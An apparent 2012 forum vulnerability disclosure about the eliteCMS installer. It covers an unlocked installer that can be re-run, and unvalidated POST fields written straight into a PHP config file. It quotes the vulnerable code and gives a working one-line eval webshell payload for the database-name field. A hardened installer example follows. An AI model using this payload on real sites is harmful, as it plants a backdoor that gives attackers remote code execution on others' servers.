中国网络渗透测试联盟

Title: eliteCMS installer left unverified + one-line webshell write vulnerability

Author: admin    Time: 2012-11-18 13:59
eliteCMS's installer is not locked after installation finishes, so an attacker can re-run the installation simply by visiting the installer URL again.

The other vulnerability: the installer can write a one-line webshell straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
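Added example (not code from eliteCMS or from the original post): a hardened replacement for the step-4 writer. It refuses to run once an install.lock file exists, whitelists each field, and emits values with var_export() so that input containing ?> or quotes stays inside a string literal instead of becoming code. The function names, the install.lock path and the whitelist patterns are assumptions; the field names and target path match the installer above.

```php
<?php
// Added example, not eliteCMS code. Assumed: the function names below, the
// install.lock path and the whitelist patterns. Field names and the target
// path match the original installer.
define('INSTALL_LOCK', __DIR__ . '/install.lock');

// Whitelist each setting before it gets anywhere near generated PHP.
function validate_setting(string $key, string $value): string
{
    $patterns = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-:]{1,253}$/',  // hostname[:port]
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',      // MySQL identifier limit
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
        'DB_PASS'   => '/^[^\x00-\x1F]{0,128}$/',     // no control characters
    ];
    if (!isset($patterns[$key]) || !preg_match($patterns[$key], $value)) {
        throw new InvalidArgumentException("Rejected value for $key");
    }
    return $value;
}

// Build the config from PHP literals, never by pasting raw strings into code.
function render_config(array $settings): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = validate_setting($key, $settings[$key] ?? '');
        // var_export() emits a quoted, escaped literal, so a value containing
        // ?> or quotes cannot close the string and start a new PHP block.
        $out .= sprintf("define(%s, %s);\n",
                        var_export($key, true), var_export($value, true));
    }
    return $out;  // no trailing ?>: nothing can be appended as output
}

function write_config_safely(string $file, array $post): void
{
    if (file_exists(INSTALL_LOCK)) {            // installer already ran
        http_response_code(403);
        exit('Installer is locked.');
    }
    $code = render_config($post);
    $tmp  = $file . '.tmp';                     // write atomically, then lock
    file_put_contents($tmp, $code, LOCK_EX);
    chmod($tmp, 0640);
    rename($tmp, $file);
    file_put_contents(INSTALL_LOCK, date('c') . "\n");
}
write_config_safely(__DIR__ . '/../admin/includes/config.php', $_POST);
```

With this version the payload from the post is rejected by the DB_NAME pattern before anything is written, and even a value that passed the pattern would land inside a quoted literal rather than as executable PHP.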

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2